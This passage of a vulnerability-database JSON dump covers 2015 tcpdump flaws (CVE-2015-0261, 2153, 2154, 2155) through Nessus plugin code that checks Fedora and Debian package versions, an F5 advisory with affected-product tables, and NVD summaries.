Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "enchantments": {}, "hash": "6861166277d65ce8563c272672d1fb6c25d7fa22306af333255a50d7059172ba", "hashmap": [{"hash": "0cd6bae46b6c121e3245ba39dbe92ae7", "key": "cvelist"}, {"hash": "1717dc64ce58819ecb43043c920ac1e0", "key": "pluginID"}, {"hash": "3bf9f335cf7133ec3558c5981a7a5c4b", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "837fe056656f2dca971f36770f2f076e", "key": "description"}, {"hash": "da24fa604e71295d422585026996451c", "key": "title"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "4734fd35f6702a811bc9c2931dc22d6c", "key": "href"}, {"hash": "281278142c1d4f94e3e5900b417d6b70", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "c132aa5866a601b1193cd8b0c108aeb2", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=82556", "id": "FEDORA_2015-4804.NASL", "lastseen": "2016-09-26T17:24:17", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.2", "pluginID": "82556", "published": "2015-04-03T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1201795", "https://bugzilla.redhat.com/show_bug.cgi?id=1201792", "https://bugzilla.redhat.com/show_bug.cgi?id=1201797", "http://www.nessus.org/u?75b00466"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4804.\n#\n\ninclude(\"compat.inc\");\n\nif 
(description)\n{\n script_id(82556);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:18 $\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\");\n script_bugtraq_id(73017, 73018, 73019);\n script_xref(name:\"FEDORA\", value:\"2015-4804\");\n\n script_name(english:\"Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261,\nCVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201795\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153999.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?75b00466\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"tcpdump-4.7.3-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "title": "Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:24:17"}], "edition": 5, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "ebdf7e83bd7bce5ac84476b2fe2e176c"}, {"key": "cvelist", "hash": "0cd6bae46b6c121e3245ba39dbe92ae7"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "f148087e200cde7d00dbdeeb0b74cf51"}, {"key": "href", "hash": "4734fd35f6702a811bc9c2931dc22d6c"}, {"key": "modified", "hash": "9a00910eeedb8c835c4637a953896665"}, {"key": "naslFamily", "hash": "be931514784f88df80712740ad2723e7"}, {"key": "pluginID", "hash": "1717dc64ce58819ecb43043c920ac1e0"}, {"key": "published", "hash": "281278142c1d4f94e3e5900b417d6b70"}, {"key": "references", "hash": "c132aa5866a601b1193cd8b0c108aeb2"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "3bf9f335cf7133ec3558c5981a7a5c4b"}, {"key": "title", "hash": "da24fa604e71295d422585026996451c"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": 
"ea184d6b721d2d67c33ba86e8b4bdead9590dc5a454fdb3e4c1588edd4e55104", "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "f5", "idList": ["SOL16837", "F5:K16837"]}, {"type": "cve", "idList": ["CVE-2015-2154", "CVE-2015-2153", "CVE-2015-0261"]}, {"type": "nessus", "idList": ["FEDORA_2015-4953.NASL", "DEBIAN_DSA-3193.NASL", "OPENSUSE-2015-267.NASL", "GENTOO_GLSA-201510-04.NASL", "FEDORA_2015-4939.NASL", "MANDRIVA_MDVSA-2015-182.NASL", "UBUNTU_USN-2580-1.NASL", "ALA_ALAS-2015-557.NASL", "DEBIAN_DLA-174.NASL", "SUSE_11_TCPDUMP-150320.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310869600", "OPENVAS:1361412562310121417", "OPENVAS:703193", "OPENVAS:1361412562310703193", "OPENVAS:1361412562310842179", "OPENVAS:1361412562310120040", "OPENVAS:1361412562310869148", "OPENVAS:1361412562310869254", "OPENVAS:1361412562310871861"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31791", "SECURITYVULNS:VULN:14315"]}, {"type": "kaspersky", "idList": ["KLA10498"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3193-1:51CD5", "DEBIAN:DLA-174-1:F5DF3"]}, {"type": "ubuntu", "idList": ["USN-2580-1"]}, {"type": "gentoo", "idList": ["GLSA-201510-04"]}, {"type": "amazon", "idList": ["ALAS-2015-557"]}, {"type": "archlinux", "idList": ["ASA-201503-20"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132762"]}, {"type": "zdt", "idList": ["1337DAY-ID-23903"]}, {"type": "exploitdb", "idList": ["EDB-ID:37663"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-1871"]}, {"type": "redhat", "idList": ["RHSA-2017:1871"]}, {"type": "centos", "idList": ["CESA-2017:1871"]}], "modified": "2019-01-16T20:21:13"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4804.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82556);\n 
script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:18 $\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\");\n script_bugtraq_id(73017, 73018, 73019);\n script_xref(name:\"FEDORA\", value:\"2015-4804\");\n\n script_name(english:\"Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261,\nCVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201795\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153999.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?75b00466\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"tcpdump-4.7.3-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "82556", "cpe": ["p-cpe:/a:fedoraproject:fedora:tcpdump", "cpe:/o:fedoraproject:fedora:22"]}
{"f5": [{"lastseen": "2016-09-26T17:22:51", "bulletinFamily": "software", "description": "Recommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability for Traffix SDC, you can use the **tshark** utility instead of the **tcpdump** utility.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n", "modified": "2015-07-02T00:00:00", "published": "2015-07-02T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/800/sol16837.html", "id": "SOL16837", "title": "SOL16837 - tcpdump before 4.7.2 vulnerabilities CVE-2015-0261, CVE-2015-0261, CVE-2015-2153, CVE-2015-2154, CVE-2015-2155", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-12T02:11:10", "bulletinFamily": "software", "description": "Description \n\n\n * [CVE-2015-0261](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0261>) \n \nInteger signedness error in the mobility_opt_print function in the IPv6 mobility printer in tcpdump before 4.7.2 allows remote attackers to cause a 
denial of service (out-of-bounds read and crash) or possibly execute arbitrary code via a negative length value. \n\n * [CVE-2015-2153](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2153>) \n \nThe rpki_rtr_pdu_print function in print-rpki-rtr.c in the TCP printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read or write and crash) via a crafted header length in an RPKI-RTR Protocol Data Unit (PDU). \n\n * [CVE-2015-2154](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2154>) \n \nThe osi_print_cksum function in print-isoclns.c in the ethernet printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a crafted (1) length, (2) offset, or (3) base pointer checksum value. \n\n * [CVE-2015-2155](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2155>) \n \nThe force printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unspecified vectors.\n\nImpact \n\n\nA malformed packet may cause **tcpdump** to fail or execute arbitrary code.\n\n**Note:** The **tcpdump** utility is in use only when debugging network issues. In normal operational mode, **tcpdump** is not running. For this vulnerability to be relevant, an attacker must send specially crafted traffic at the same time an administrative user is capturing traffic on one of the internal nodes of a cluster that has access to an external network in the mobile operator's network. The chance of this scenario is almost null. 
\n\n\nStatus\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None \n| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | None | 11.4.0 - 11.6.0 | Not vulnerable | None \nBIG-IP AFM | None | 11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP Analytics | None | 11.0.0 - 11.6.0 | Not vulnerable | None \nBIG-IP APM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Edge Gateway \n| None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP GTM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None \n| 6.0.0 - 6.4.0 \n| Not vulnerable | None \n \nEnterprise Manager | None \n| 3.0.0 - 3.1.1 | Not vulnerable | None \nFirePass | None \n| 7.0.0 \n6.0.0 - 6.1.0 \n| Not vulnerable | None \n \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nLineRate | None \n| 2.4.0 - 2.6.0 \n| Not vulnerable | None \n \nF5 WebSafe | None \n| 1.0.0 \n| Not vulnerable | None \n \nTraffix SDC 
| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | None \n| Low \n| tcpdump \n \n \nRecommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability for Traffix SDC, you can use the **tshark** utility instead of the **tcpdump** utility.\n\nSupplemental Information\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x)](<https://support.f5.com/csp/article/K13123>)\n", "modified": "2016-01-09T02:23:00", "published": "2015-07-03T00:33:00", "id": "F5:K16837", "href": "https://support.f5.com/csp/article/K16837", "title": "tcpdump before 4.7.2 vulnerabilities CVE-2015-0261, CVE-2015-0261, CVE-2015-2153, CVE-2015-2154, CVE-2015-2155", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2018-10-10T11:05:49", "bulletinFamily": "NVD", "description": "The 
osi_print_cksum function in print-isoclns.c in the ethernet printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a crafted (1) length, (2) offset, or (3) base pointer checksum value.", "modified": "2018-10-09T15:56:06", "published": "2015-03-24T13:59:07", "id": "CVE-2015-2154", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2154", "title": "CVE-2015-2154", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-10T11:05:49", "bulletinFamily": "NVD", "description": "The rpki_rtr_pdu_print function in print-rpki-rtr.c in the TCP printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read or write and crash) via a crafted header length in an RPKI-RTR Protocol Data Unit (PDU).", "modified": "2018-10-09T15:56:04", "published": "2015-03-24T13:59:06", "id": "CVE-2015-2153", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2153", "title": "CVE-2015-2153", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-10T11:05:48", "bulletinFamily": "NVD", "description": "Integer signedness error in the mobility_opt_print function in the IPv6 mobility printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read and crash) or possibly execute arbitrary code via a negative length value.", "modified": "2018-10-09T15:55:36", "published": "2015-03-24T13:59:02", "id": "CVE-2015-0261", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0261", "title": "CVE-2015-0261", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-01-16T20:21:20", "bulletinFamily": "scanner", "description": "Contains security fix for CVE-2015-0261, CVE-2015-2154, 
CVE-2015-2153,\nCVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2015-10-19T00:00:00", "published": "2015-04-20T00:00:00", "id": "FEDORA_2015-4953.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82870", "title": "Fedora 20 : tcpdump-4.5.1-4.fc20 (2015-4953)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4953.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82870);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:14:51 $\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\");\n script_xref(name:\"FEDORA\", value:\"2015-4953\");\n\n script_name(english:\"Fedora 20 : tcpdump-4.5.1-4.fc20 (2015-4953)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Contains security fix for CVE-2015-0261, CVE-2015-2154, CVE-2015-2153,\nCVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201795\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-April/154808.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4b228f8f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: 
\"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"tcpdump-4.5.1-4.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:21:02", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in tcpdump, a\ncommand-line network traffic analyzer. These vulnerabilities might\nresult in denial of service (application crash) or, potentially,\nexecution of arbitrary code.", "modified": "2018-11-10T00:00:00", "published": "2015-03-18T00:00:00", "id": "DEBIAN_DSA-3193.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81899", "title": "Debian DSA-3193-1 : tcpdump - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3193. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81899);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/10 11:49:37\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_xref(name:\"DSA\", value:\"3193\");\n\n script_name(english:\"Debian DSA-3193-1 : tcpdump - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in tcpdump, a\ncommand-line network traffic analyzer. These vulnerabilities might\nresult in denial of service (application crash) or, potentially,\nexecution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/tcpdump\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 